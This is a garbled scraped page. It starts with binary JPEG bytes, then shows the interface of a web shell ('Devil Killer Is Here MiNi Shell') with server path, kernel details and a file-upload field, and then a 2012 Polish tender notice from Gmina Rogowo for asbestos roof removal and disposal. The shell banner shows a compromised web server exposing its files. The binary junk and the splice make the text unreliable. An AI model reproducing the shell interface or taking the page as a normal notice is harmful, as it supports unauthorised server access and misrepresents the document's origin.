JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120521/112441-N-2012.html

<p class="kh_header"><b>Rogowo: Demontaż, transport i unieszkodliwianie wyrobów zawierających azbest na terenie Gminy Rogowo</b><br>
<b>Numer ogłoszenia: 112441 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogowo , ul. Kościelna 8, 88-420 Rogowo, woj. kujawsko-pomorskie, tel. 52 3024053, faks 52 3024275.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://rogowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Demontaż, transport i unieszkodliwianie wyrobów zawierających azbest na terenie Gminy Rogowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się wykonanie usługi polegającej na demontażu, załadunku,  transporcie i unieszkodliwieniu wyrobów zawierających azbest z terenu Gminy Rogowo w szczególności:
1)Demontaż pokryć dachowych z płyt falistych z budynków mieszkalnych oraz gospodarczych zlokalizowanych na nieruchomościach stanowiących własność  osób fizycznych w ilości 12,463 Mg, (1 133,00  m2)  polegający na;
a)demontażu pokryć dachowych z płyt falistych zawierających azbest na budynkach zabudowy indywidualnej zlokalizowanych na terenie Gminy Rogowo, zgodnie z załączonym harmonogramem rzeczowo finansowym do projektu umowy;
b)pakowaniu i załadunku na oznakowane, specjalistyczne środki transportu;
c)transporcie zebranych odpadów zawierających azbest do miejsc ich unieszkodliwienia wskazanych przez Wykonawcę. Odbiorcy odpadów wskazani przez Wykonawcę powinni posiadać stosowne zezwolenia na prowadzenie działalności w zakresie unieszkodliwiania odpadów zawierających azbest i umowę zawartą z Wykonawcą;
d)zdeponowaniu na składowisku przetransportowanych odpadów zawierających azbest;
e)Wykonawca wystawi oświadczenie dla właściciela nieruchomości, że prace związane z usunięciem wyrobów zawierających azbest zostały wykonane              z zachowaniem właściwych przepisów, a teren został prawidłowo oczyszczony       z   odpadów niebezpiecznych;
e) prowadzenie ilościowej i jakościowej ewidencji odpadów określonych w art. 36 ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. Nr 185, poz. 1243 z późn. zm.) z zastosowaniem wzorów dokumentów określonych rozporządzeniem Ministra Środowiska określonych rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Nr 249, poz. 1673);
f)dostarczanie Zamawiającemu kart przekazania odpadu dla każdej nieruchomości(posesji, z której jest usuwany wyrób zawierający azbest (karta przekazania odpadu wystawiona na właściciela nieruchomości(posesji) oraz kart przekazania odpadu na składowisko dla każdej nieruchomości(posesji celem potwierdzenia ilości usuniętego azbestu z danej nieruchomości;
g) koszty ważenia wyrobów zawierających azbest ponosi Wykonawca. Ważenie zdemontowanych i odbieranych  odpadów powinno odbywać się w obecności właściciela nieruchomości. Wykonawca dokonuje ważenia i z tej czynności sporządza protokół odbiorowy zawierający co najmniej następujące informacje: imię i nazwisko właściciela nieruchomości, od którego odbierane są odpady zawierające azbest, adres nieruchomości, data odbioru, ilość odebranych odpadów w Mg i m2, potwierdzenie prawidłowego wykonania usługi. Protokół winien być podpisany przez Wykonawcę usługi, właściciela nieruchomości  i przekazany Zamawiającemu, który protokół winien zatwierdzić;
f) przekazywanie na żądanie Zamawiającego informacji dotyczących realizowanych usług;
g)Zamawiający zastrzega, iż ze względu na charakter prowadzonej usługi wartości podane wyżej mogą w trakcie realizacji przedmiotu zamówienia ulec zwiększeniu lub zmniejszeniu wielkości;
h)roboty demontażowe pokryć dachowych zostały zgłoszone do Starostwa Powiatowego w Żninie;
2)odbiór składowanych (zgodnie z przewidziana prawem technologią) płyt falistych zawierających azbest w ilości 32,164 Mg, (2 924,00 m2) z nieruchomości stanowiących własność osób fizycznych z terenu Gminy Rogowo polegający na: 
a) odbiorze z nieruchomości składowanych płyt azbestowo - cementowych, zgodnie  z załączonym harmonogramem rzeczowo - finansowym do projektu umowy;
b) pakowaniu i załadunku na oznakowane, specjalistyczne środki transportu;
c) transporcie zebranych odpadów zawierających azbest do miejsc ich unieszkodliwienia wskazanych przez Wykonawcę. Odbiorcy odpadów wskazani przez Wykonawcę powinni posiadać stosowne zezwolenia na prowadzenie działalności w zakresie unieszkodliwiania odpadów zawierających azbest i umowę zawarta z Wykonawcą;
d)zdeponowanie na składowisku przetransportowanych odpadów zawierających azbest;
e) prowadzenie ilościowej i jakościowej ewidencji odpadów określonych w art. 36 ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. Nr 185, poz. 1243 z późn. zm.) z zastosowaniem wzorów dokumentów określonych rozporządzeniem Ministra Środowiska określonych rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Nr 249, poz. 1673);
f) dostarczanie Zamawiającemu kart przekazania odpadu dla każdej nieruchomości(posesji, z której jest usuwany wyrób zawierający azbest (karta przekazania odpadu wystawiona na właściciela nieruchomości(posesji) oraz kart przekazania odpadu na składowisko dla każdej nieruchomości(posesji celem potwierdzenia ilości usuniętego azbestu z danej nieruchomości;
g) przekazywanie na żądanie Zamawiającego informacji dotyczących realizowanych usług;
h)koszty ważenia wyrobów zawierających azbest ponosi Wykonawca. Ważenie zmagazynowanych (składowanych) i odbieranych  odpadów powinno odbywać się w obecności właściciela nieruchomości. Wykonawca dokonuje ważenia i z tej czynności sporządza protokół zawierający co najmniej następujące informacje: imię i nazwisko właściciela nieruchomości, od którego odbierane są odpady zawierające azbest, adres nieruchomości, data odbioru, ilość odebranych odpadów w Mg i m2, potwierdzenie prawidłowego wykonania usługi. Protokół winien być podpisany przez Wykonawcę usługi, właściciela nieruchomości  i przekazany Zamawiającemu, który protokół winien zatwierdzić. Podane ilości do protokółu powinny być zgodne z kartami przekazania odpadu;
i) Zamawiający zastrzega, iż ze względu na charakter prowadzonej usługi wartości podane wyżej mogą w trakcie realizacji przedmiotu zamówienia ulec zwiększeniu lub zmniejszeniu wielkości.
Łączna ilość odpadów zawierających azbest w m2 wynosi 4 057,00 a ciężar 44, 627 Mg. 
3) Przedmiot zamówienia należy wykonać zgodnie z prawem obowiązującym w tym zakresie tj.:
a)ustawą z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2010r. Nr 185, poz. 1243  z późn. zm.);
b)ustawą z dnia 19 czerwca 2001r. Prawo ochrony środowiska (Dz. U. 2008r. Nr 25, poz. 150 z późn. zm.);
c)ustawą z dnia 19 czerwca 1997r. o zakazie stosowania wyrobów zawierających azbest (Dz. U. z 2004r. Nr 3, poz. 20 z późn. zm.)
d)ustawą z dnia 19 sierpnia 2011r. o przewozie towarów niebezpiecznych (Dz. U.   Nr 227, poz. 1367);
e)rozporządzeniem Ministra Gospodarki i Pracy z dnia 14 października 2005r.          w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczeniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz. U. Nr 216, poz. 1824);
f)rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. Nr 71, poz. 649 z późn. zm.);
g)rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Nr 249, poz. 1673) w zakresie wykorzystywania wyrobów zawierających azbest oraz wykorzystywania i oczyszczania instalacji lub urządzeń, w których były lub są wykorzystywane wyroby zawierające azbest (Dz. U. z 2011r.  Nr 8, poz. 31);
h)ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.);
i)rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa  i ochrony zdrowia (Dz. U. Nr 120, poz. 1126).
4)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 
5)Wymagania dotyczące robót:
a)wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż,  przy maksymalnym ograniczeniu uciążliwości prowadzenia usługi u właścicieli nieruchomości;
b)usługę należy prowadzić zgodnie z obowiązującymi przepisami w tym zakresie oraz wymogami niniejszej SIWZ;
6)Wymagania stawiane Wykonawcy:
a)Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi jakościowymi określonymi dla przedmiotu zamówienia;
b)wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia;
c)Wykonawca zabezpieczy teren robót mając w szczególności na względzie mienie  właścicieli nieruchomości. W związku z tym Wykonawca winien dostarczyć dokumenty potwierdzające uzgodnienie na piśmie z właścicielem nieruchomości (posesji), na której ma być wykonywany przedmiot zamówienia sposób zabezpieczenia wykonywanych prac oraz ewentualnego zabezpieczenia budynku w przypadku gdyby w trakcie wykonywania prac nastąpiła zmiana warunków atmosferycznych bądź inne nieprzewidziane zdarzenie uniemożliwiające wykonanie usługi w uzgodnionym terminie;
d)po zakończeniu usługi Wykonawca zobowiązany jest do uporządkowania terenu nieruchomości wraz z terenem przyległym;
e)po wykonaniu przez Wykonawcę usługi przewidzianej niniejszą SIWZ Wykonawca  przedłoży Zamawiającemu: karty przekazania odpadu dla każdej nieruchomości, kary przekazania odpadu na składowisko dla każdej nieruchomości, protokół           z ważenia wraz z potwierdzeniem, że usługa została wykonana prawidłowo (podpisany przez Wykonawcę oraz właściciela nieruchomości) oraz oświadczenie, że prace związane z usunięciem wyrobów zawierających azbest zostały wykonane   z zachowaniem właściwych przepisów, a teren został prawidłowo oczyszczony  z odpadów niebezpiecznych dla każdej nieruchomości objętej przedmiotem zamówienia;
f)Wykonawca po podpisaniu umowy z Zamawiającym skontaktuje się i umówi         z właścicielami na termin: demontażu oraz odbioru wyrobów zawierających azbest zgodnie z załączonym do projektu harmonogramem rzeczowo-finansowym (zgodnie z zapisem w § 2 ust. 3 w projekcie umowy); 
g)spełnienie innych wymagań określonych we wzorze umowy oraz wynikających      z obowiązujących przepisów prawa.
7)	Możliwość zatrudnienia podwykonawców:
a)Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonanie części zamówienia podwykonawcom; w takim przypadku Wykonawca jest zobowiązany do wskazania w swojej ofercie części zamówienia (zakresu), której wykonanie zamierza powierzyć podwykonawcom;
b)Zamawiający może zgodnie z art. 647 K.c. wnieść sprzeciw lub zastrzeżenia       do umowy zawartej pomiędzy Wykonawcą a podwykonawcą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8, 45.26.26.60-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Weryfikacja tego warunku nastąpi poprzez odesłanie do odrębnych przepisów, które wskazują na obowiązek posiadania uprawnień do wykonywania określonej działalności lub czynności. Wykazaniu spełnienia tego warunku może posłużyć odpowiedni dokument koncesji, zezwolenia lub licencji Wykonawcy (ubiegającego się o zamówienie publiczne-przyszła strona umowy).
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia(nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do weryfikacji spełnienia tego warunku posłużą odpowiednio wykazy wykonanych usług. Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że wykonali  usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonane należycie. Wykonawcy powinni udokumentować co najmniej trzy usługi w zakresie usuwania wyrobów zawierających azbest w ilości 1000 m2 każda- Zamawiający nie dopuszcza sumowania zadań celem uzyskania wymaganego warunku-załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że Weryfikacji spełnienia tego warunku dokonywana będzie w oparciu o potencjał techniczny zdolny do realizacji niniejszego zamówienia (wyposażenie zakładu, urządzenia techniczne).  
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia( nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  osobami posiadającymi wymagane uprawnienia (zaświadczenia o ukończeniu szkoleń, certyfikaty)  w tym  uprawnienia do kierowania robotami budowlanymi        o specjalności konstrukcje budowlane w ograniczonym zakresie (minimum) jedna osoba. Wraz z ważnym zaświadczeniem o przynależności do właściwej Izby Inżynierów Budownictwa. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia( nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie niniejszego zamówienia musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia( nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (załącznik   nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty nie wymienione w ust. 1-7 niniejszego rozdziału SIWZ:
a)wypełniony i podpisany przez Wykonawcę formularz oferty załącznik nr 1          do SIWZ;
b)projekt umowy (zaparafowany na każdej stronie) stanowiący załącznik nr 9       do SIWZ;
c)harmonogram rzeczowo-finansowy- załącznik nr 1 do projektu umowy;
d)zobowiązanie innego podmiotu załącznik nr 8 do SIWZ,
e)aktualną decyzję zatwierdzającą program gospodarki odpadami, w tym odpdów zawierających azbest, dla odpadów o kodach co najmniej 17 06 01 i 17 06 05 wystawioną przez Marszałka Województwa właściwego ze względu na siedzibę Wykonawcy, wynikająca z ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U.    z 2010r. Nr 185, poz. 1243 z późn. zm.), oryginał lub kserokopia potwierdzona za zgodność z oryginałem przez osobę uprawnioną;
f)aktualne zezwolenie na transport odpadów niebezpiecznych o kodach 17 06 01 i 17 06 05-wydanego przez właściwego Starostę ze względu na miejsce siedziby Wykonawcy-oryginał lub kserokopia potwierdzona przez osobę uprawnioną;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, a dotyczących:
1)zmiany osób wskazanych do kontaktu w sprawach realizacji umowy w przypadku zdarzeń uniemożliwiających wykonywanie przez nich wskazanych funkcji; 
2)zmiany terminu zakończenia realizacji inwestycji:
a)z powodu okoliczności siły wyższej tj. klęski żywiołowej, warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,
3)zmiany obowiązującej stawki podatku VAT:
a)zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części jakiej dotyczą   te zmiany przepisów.
4)zmiany sposobu wykonania usługi na skutek zmiany ilości wyrobów zawierających azbest przeznaczonych do demontażu, transportu i unieszkodliwienia lub tylko do zabrania z nieruchomości zmagazynowanych wyrobów zawierających azbest, transport i unieszkodliwienie.
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://rogow..bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rogowo ul. Kościelna 8, 88 - 420 Rogowo k/Żnina.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 11:00, miejsce: Ofertę należy złożyć w Urzędzie Gminy Rogowo ul. Kościelna 8, 88-420 Rogowo pok. 3-sekretariat (parter) do dnia 29 maja 2012r. do godz. 11:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Toruniu.</p>
